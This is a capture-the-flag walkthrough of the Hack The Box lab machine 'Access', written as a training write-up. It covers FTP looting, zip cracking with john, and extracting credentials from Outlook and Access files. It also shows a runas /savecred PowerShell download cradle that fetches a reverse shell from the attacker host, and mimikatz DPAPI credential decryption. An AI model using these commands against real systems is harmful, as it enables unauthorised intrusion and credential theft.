HTB- Access
Enumeration
Scope
IP Address: 10.10.10.98
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p- --min-rate 10000 $ip -Pn -vv
PORT STATE SERVICE REASON
21/tcp open ftp syn-ack
23/tcp open telnet syn-ack
80/tcp open http syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ nmap -p21,23,80 $ip -sCV -oN Nmap/script-scan
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: PASV failed: 425 Cannot open data connection.
| ftp-syst:
|_ SYST: Windows_NT
23/tcp open telnet?
80/tcp open http Microsoft IIS httpd 7.5
|_http-title: MegaCorp
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows* Open ports: 21 - 23 - 80
* UDP Open ports: None
* Services: FTP - TELNET - HTTP
* Versions:
* Important Notes:Enumeration
HTTP The webapp didn't reveal anything except this image at http://10.10.10.98
FTP I'm used to downloading all files on ftp server by one command and explore them locally
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ wget -m --no-passive ftp://anonymous:anonymous@$ip
<snip>
FINISHED --2024-07-07 11:19:01--
Total wall clock time: 1m 4s
Downloaded: 5 files, 5.4M in 43s (129 KB/s)all files downloaded in 10.10.10.98 folder
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ ls
10.10.10.98 Nmap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ tree 10.10.10.98
10.10.10.98
├── Backups
│ └── backup.mdb
└── Engineer
└── Access Control.zipLooking into zip file, it contains a .pst file and also encrypted
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ unzip -l 10.10.10.98/Engineer/Access\ Control.zip
Archive: 10.10.10.98/Engineer/Access Control.zip
Length Date Time Name
--------- ---------- ----- ----
271360 2018-08-24 01:13 Access Control.pst
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Engineer/Access\ Control.zip
10.10.10.98/Engineer/Access Control.zip: Zip archive data, at least v2.0 to extract, compress
ion method=AES Encrypted I will get the hash with john the ripper and attempt to crack it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ zip2john Access\ Control.zip > zip.hashCracking Failed
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=/usr/share/wordlists/rockyou.txt
<snip>
Session completed.
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --show
0 password hashes cracked, 1 leftI want to know what is that file and from the output below it's Microsoft Access Database
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file 10.10.10.98/Backups/backup.mdb
10.10.10.98/Backups/backup.mdb: Microsoft Access DatabaseI had to move it to windows host and explore it.
I found a table that contain usernames & passwords
admin:admin
engineer:access4u@security
backup_admin:adminI will try to telnet with these credentials since, there is no SMB protocol
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ hydra -L users.lst -P passwords.list telnet://$ip
1 of 1 target completed, 0 valid password foundInitial Access
I remember that I couldn't crack the zip file, So I will try these passwords to decrypt the file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ john zip.hash --wordlist=passwords.list
<snip>
access4u@security (Access Control.zip/Access Control.pst) ┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ 7z x Access\ Control.zip
<snip>
Enter password (will not be echoed):
Everything is Ok
Size: 271360
Compressed: 10870It revealed Access Control.pst file and I wanted to know what its type
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ file Access\ Control.pst
Access Control.pst: Microsoft Outlook Personal Storage (>=2003, Unicode, version 23), dwReserved1=0x234, dwReserved2=0x22f3a, bidUnused=0000000000000000, dwUnique=0x39, 271360 bytes, bCryptMethod=1, CRC32 0x744a1e2eIt's Microsoft Outlook Personal Storage, I moved it to my windows host and opened it with outlook
It contains an email with the following data
Hi there,
The password for the “security” account has been changed to 4Cc3ssC0ntr0ller. Please ensure this is passed on to your engineers.
Regards,
JohnSo, We get a new credentials security:4Cc3ssC0ntr0ller and I will try it on telnet
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: security
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>C:\Users\security>type Desktop\user.txt
713d8fafce27a927227b6a3124c79ea3User Flag: 713d8fafce27a927227b6a3124c79ea3
Privilege Escalation
When I land on any windows machine on HTB, I always run cmdkey /list to view saved credentials
C:\Users>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=ACCESS\Administrator
Type: Domain Password
User: ACCESS\Administrator This can be abused to run as admin with runas command.
Since we can't execute .exe files, I will try to execute .ps1 as administrator, So I grep Invoke-PowerShellTcp.ps1 from my host, start webserver & nc listener and execute the command as administrator
We must add this line before executing the shell to Invoke-PowerShellTcp.ps1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.3 -Port 443Change IP & Port to yours when modifying the file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ python3 -m http.server 80Netcat listener
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443C:\Users\security> runas /savecred /user:ACCESS\Administrator "PowerShell -c IEX (New-Object Net.webclient).DownloadString('http://10.10.16.3/Invoke-PowerShellTcp.ps1')"┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ web-server
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [08/Jul/2024 05:31:42] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.98] 49161
PS C:\Windows\system32>whoami
access\administratorPS C:\Windows\system32> cd C:\Users\administrator\Desktop\
PS C:\Users\administrator\Desktop> type root.txt
066b2ca40b4ab07b4387c6e4fe06bc32Root Flag: 066b2ca40b4ab07b4387c6e4fe06bc32
Alternative path
Since the administrator credentials is stored in security user session, We can get the credentials by decrypting DPAPI secrets
We must have two files masterkey & credentials and there are located in current user directory under C:\Users\Security\AppData\Roaming\Microsoft\ but hidden.
I personally use ls with -Force flag to list hidden files
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\
Directory: C:\Users\Security\AppData\Roaming\Microsoft
Mode LastWriteTime Length Name
---- ------------- ------ ----
<snip>
d---s 8/22/2018 10:18 PM Credentials
d---s 8/22/2018 10:18 PM Protect
<snip>
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Protect
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Protect
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s 8/22/2018 10:18 PM S-1-5-21-953262931-566350628-63446256-1001
-a-hs 8/22/2018 10:18 PM 24 CREDHIST
C:\Users\security>powershell -c ls -Force C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Directory: C:\Users\Security\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs 8/22/2018 10:18 PM 538 51AB168BE4BDB3A603DADE4F8CA81290I will encode the two files as base64 and decode them in my attack host
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262
931-566350628-63446256-1001\0792c32e-48a5-4fe3-8b43-d93d64590580 .\key
CertUtil: -encode command completed successfully.
C:\Users\security>powershell -c certutil -encode C:\Users\Security\AppData\Roaming\Microsoft\Credentials\51AB168BE4B
DB3A603DADE4F8CA81290 .\key1
CertUtil: -encode command completed successfully.
C:\Users\security>type key
-----BEGIN CERTIFICATE-----
AgAAAAAAAAAAAAAAMAA3ADkAMgBjADMAMgBlAC0ANAA4AGEANQAtADQAZgBlADMA
LQA4AGIANAAzAC0AZAA5ADMAZAA2ADQANQA5ADAANQA4ADAAAAAAAAAAAAAFAAAA
sAAAAAAAAACQAAAAAAAAABQAAAAAAAAAAAAAAAAAAAACAAAAnFHKTQBwjHPU+/9g
uV5UnvhDAAAOgAAAEGYAAOePsdmJxMzXoFKFwX+uHDGtEhD3raBRrjIDU232E+Y6
DkZHyp7VFAdjfYwcwq0WsjBqq1bX0nB7DHdCLn3jnri9/MpVBEtKf4U7bwszMyE7
Ww2Ax8ECH2xKwvX6N3KtvlCvf98HsODqlA1woSRdt9+Ef2FVMKk4lQEqOtnHqMOc
wFktBtcUye6P40ztUGLEEgIAAABLtt2bW5ZW2Xt48RR5ZFf0+EMAAA6AAAAQZgAA
D+azql3Tr0a9eofLwBYfxBrhP4cUoivLW9qG8k2VrQM2mlM1FZGF0CdnQ9DBEys1
/a/60kfTxPX0MmBBPCi0Ae1w5C4BhPnoxGaKvDbrcye9LHN0ojgbTN1Op8Rl3qp1
Xg9TZyRzkA24hotCgyftqgMAAADlaJYABZMbQLoN36DhGzTQ
-----END CERTIFICATE-----
C:\Users\security>type key1
-----BEGIN CERTIFICATE-----
AQAAAA4CAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAALsOSB6VI40+LQ9k9
ZFkFgAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQA
aQBhAGwAIABEAGEAdABhAA0ACgAAABBmAAAAAQAAIAAAAPW7usJAvZDZr308LPt/
MB8fEjrJTQejzAEgOBNfpaa8AAAAAA6AAAAAAgAAIAAAAPlkLTI/rjZqT3KT0C8m
5Ecq3DKwC6xqBhkURY2t/T5SAAEAAOc1Qv9x0IUp+dpf+I7c1b5E0RycAsRf39nu
WlMWKMsPno3CIetbTYOoV6/xNHMTHJJ1JyF/4XfgjWOmPrXOU0FXazMzKAbgYjY+
WHhvt1Uaqi4GdrjjlX9Dzx8Rou0UnEMRBOX5PyA2SRbfJaAWjt4jeIvZ1xGSzbZh
xcVobtJWyGkQV/5v4qKxdlugl57pFAwBAhDuqBrACDD3TDWhlqwfRr1p16hsqC2h
X5u88cQMu+QdWNSokkr96X4qmabp8zopfvJQhAHCKaRRuRHpRpuhfXEojcbDfuJs
ZezIrM1LWzwMLM/K5rCnY4Sg4nxO23oOzs4q/ZiJJSME21dnu8NAAAAAY/zBU7zW
C+/QdKUJjqDlUviAlWLFU5hbqocgqCjmHgW9XRy4IAcRVRoQDtO4U1mLOHW6kLaJ
vEgzQvv2cbicmQ==
-----END CERTIFICATE-----On windows host:
mimikatz # dpapi::masterkey /in:C:\Users\HTB\Desktop\masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 00000005 - 5
dwMasterKeyLen : 000000b0 - 176
dwBackupKeyLen : 00000090 - 144
dwCredHistLen : 00000014 - 20
dwDomainKeyLen : 00000000 - 0
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 9c51ca4d00708c73d4fbff60b95e549e
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : 4bb6dd9b5b9656d97b78f114796457f4
rounds : 000043f8 - 17400
algHash : 0000800e - 32782 (CALG_SHA_512)
algCrypt : 00006610 - 26128 (CALG_AES_256)
pbKey : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa
[credhist]
**CREDHIST INFO**
dwVersion : 00000003 - 3
guid : {009668e5-9305-401b-ba0d-dfa0e11b34d0}
[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afeDecrypting credentials file with masterkey
mimikatz # dpapi::cred /in:C:\Users\HTB\Desktop\credentials
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {0792c32e-48a5-4fe3-8b43-d93d64590580}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006610 - 26128 (CALG_AES_256)
dwAlgCryptLen : 00000100 - 256
dwSaltLen : 00000020 - 32
pbSalt : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 0000800e - 32782 (CALG_SHA_512)
dwAlgHashLen : 00000200 - 512
dwHmac2KeyLen : 00000020 - 32
pbHmack2Key : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
dwDataLen : 00000100 - 256
pbData : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
dwSignLen : 00000040 - 64
pbSign : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99
Decrypting Credential:
* volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000f4 - 244
credUnk0 : 00002004 - 8196
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 8/22/2018 9:18:49 PM
unkFlagsOrSize : 00000038 - 56
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=ACCESS\Administrator
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : ACCESS\Administrator
CredentialBlob : 55Acc3ssS3cur1ty@megacorp
Attributes : 0So, the admin credentials are administrator:55Acc3ssS3cur1ty@megacorp
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Access]
└─$ telnet $ip
login: administrator
password:
*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\Administrator>type Desktop\root.txt
066b2ca40b4ab07b43xxxxxxxxxxxxxLast updated